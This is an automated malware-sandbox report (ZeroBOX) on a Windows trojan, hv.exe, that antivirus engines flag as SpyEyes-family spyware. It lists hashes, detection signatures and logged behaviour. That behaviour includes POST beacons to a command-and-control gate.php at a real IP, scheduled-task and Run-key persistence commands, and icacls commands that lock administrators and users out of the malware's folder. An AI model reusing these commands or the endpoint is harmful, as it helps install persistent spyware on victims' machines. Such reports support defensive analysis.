Summary | ZeroBOX

hv.exe

ASPack Malicious Library Malicious Packer PE File OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 7, 2021, 7:01 p.m. Sept. 7, 2021, 7:08 p.m.
Size 239.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 385eccb9e711368035f0f329f98255ec
SHA256 1e80bf1bca4a8841d973e8bf1f88e2d7cce3160793f23b2351db0aa7ea23af4e
CRC32 8EDC4B91
ssdeep 3072:zASUot4cIAg0Fuj7M1iUa2LQR/wkLsrA5vmUBmHHcTnoeYYHIwG1Opm92BuiFwdn:eLAORwAtmBHHc8eY5XOpwiFEHt1CB5O
Yara
  • PE_Header_Zero - PE File Signature
  • ASPack_Zero - ASPack packed file
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • Win32_Trojan_Gen_2_0904B0_Zero - Win32 Trojan Gen
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Packer_Zero - Malicious Packer

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
37.49.230.185 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49215 -> 37.49.230.185:80 2017930 ET MALWARE Trojan Generic - POST To gate.php with no referer A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80 2022985 ET MALWARE Trojan Generic - POST To gate.php with no accept headers A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2017930 ET MALWARE Trojan Generic - POST To gate.php with no referer A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2022985 ET MALWARE Trojan Generic - POST To gate.php with no accept headers A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80 2017930 ET MALWARE Trojan Generic - POST To gate.php with no referer A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2017930 ET MALWARE Trojan Generic - POST To gate.php with no referer A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80 2022985 ET MALWARE Trojan Generic - POST To gate.php with no accept headers A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2022985 ET MALWARE Trojan Generic - POST To gate.php with no accept headers A Network Trojan was detected
TCP 192.168.56.101:49215 -> 37.49.230.185:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2017930 ET MALWARE Trojan Generic - POST To gate.php with no referer A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2022985 ET MALWARE Trojan Generic - POST To gate.php with no accept headers A Network Trojan was detected
TCP 192.168.56.101:49214 -> 37.49.230.185:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR}" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: processed file: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Successfully processed 1 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section code
section data
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E
request POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E
request POST http://37.49.230.185/bp/gate.php?017BD04FB3BF45B68167E
description 5OEH.exe tried to sleep 146 seconds, actually delayed analysis time by 146 seconds
file C:\Users\test22\AppData\Local\7601.17514.amd64fre.win7sp1_rtm.101119-1850_x86Maria.dll
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe
parameters:
filepath: C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe
1 1 0
cmdline cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
host 37.49.230.185
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} reg_value C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} reg_value C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe
cmdline cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
cmdline icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline cmd.exe /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "test22:(R,REA,RA,RD)"
cmdline "C:\Windows\System32\cmd.exe" /c icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
cmdline icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Users:(R,REA,RA,RD)"
cmdline icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "SYSTEM:(R,REA,RA,RD)"
cmdline icacls "C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}" /inheritance:e /deny "Administrators:(R,REA,RA,RD)"
cmdline cmd.exe /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
cmdline "C:\Windows\System32\cmd.exe" /c schtasks /create /tn {5COA58OA-V7LD-VVME-LIJH-LESBVWGMLVKR} /tr C:\Users\test22\AppData\Local\{PY8FB7HW-FT5Q-FHEK-F5GD-50DG2N98L0QZ}\5OEH.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f
Bkav W32.SpyEyesaND.Trojan
Lionic Trojan.Win32.SpyEyes.l!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37249392
FireEye Generic.mg.385eccb9e7113680
McAfee GenericRXMI-NY!385ECCB9E711
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanSpy:Win32/SpyEyes.26aa6225
K7GW Trojan ( 0054f5af1 )
K7AntiVirus Trojan ( 0054f5af1 )
BitDefenderTheta Gen:NN.ZexaF.34126.ou2@aaJWp7hi
Cyren W32/Trojan.RTCJ-5872
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/Agent.AARD
APEX Malicious
Paloalto generic.ml
ClamAV Win.Malware.TinyNuke-9863711-1
Kaspersky HEUR:Trojan-Spy.Win32.SpyEyes.gen
BitDefender Trojan.GenericKD.37249392
Avast Win32:Trojan-gen
Ad-Aware Trojan.GenericKD.37249392
Sophos Mal/Generic-S
Zillya Trojan.SpyEyes.Win32.15359
TrendMicro TROJ_GEN.R002C0PGB21
McAfee-GW-Edition GenericRXMI-NY!385ECCB9E711
Emsisoft Trojan.GenericKD.37249392 (B)
Ikarus Trojan.Win32.Agent
Jiangmin TrojanSpy.SpyEyes.ppa
Avira TR/Agent.ouzrw
Antiy-AVL Trojan/Generic.ASMalwS.33E8AE7
Gridinsoft Trojan.Win32.Agent.vb
Microsoft Trojan:Win32/Mamson.A!ac
ZoneAlarm HEUR:Trojan-Spy.Win32.SpyEyes.gen
GData Trojan.GenericKD.37249392
Cynet Malicious (score: 99)
Acronis suspicious
ALYac Trojan.GenericKD.37249392
MAX malware (ai score=81)
VBA32 BScope.Trojan.Fuerboos
Malwarebytes Malware.AI.4123601789
TrendMicro-HouseCall TROJ_GEN.R002C0PGB21
Yandex Trojan.Agent!XUAvosWD/oY
SentinelOne Static AI - Suspicious PE
eGambit PE.Heur.InvalidSig
Fortinet W32/Agent.AARD!tr
AVG Win32:Trojan-gen
Panda Trj/GdSda.A